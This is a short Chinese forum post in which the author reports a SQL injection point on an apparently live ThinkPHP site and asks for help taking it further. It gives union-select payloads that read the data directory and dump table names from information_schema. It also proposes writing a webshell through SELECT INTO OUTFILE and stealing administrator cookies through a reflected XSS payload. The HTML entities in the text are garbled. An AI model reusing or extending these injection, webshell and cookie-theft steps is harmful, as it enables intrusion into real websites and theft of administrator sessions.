thinkphpmysqlnd_thinkphp框架下mysql注入

作者&＃xff1a;tnt1200

Wamp环境&＃xff0c;用thinkphp框架制作&＃xff0c;手工检测发现一个注入点。

/content/117 and 1&＃61;2 union select &＃64;&＃64;datadir,2,3,4,5,6

这个注入点同时还是一个反射型xss&＃xff0c;id值被写入到了内联js里。

接着提交

and 1&＃61;2 union select 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema&＃61;(hex值)

返回空白&＃xff0c;查看源代码发现”.”之后的语句被截断了。

现在有几个思路&＃xff0c;求指点

1.构造特殊语句&＃xff0c;使语句中不出现”.”。

2.通过Select into outfile导出webshell。但由于框架问题”/”和””都被认为是目录。

3.构造xss获取管理员COOKIEs。

eg&＃xff1a;/content/117;alert(document.COOKIE)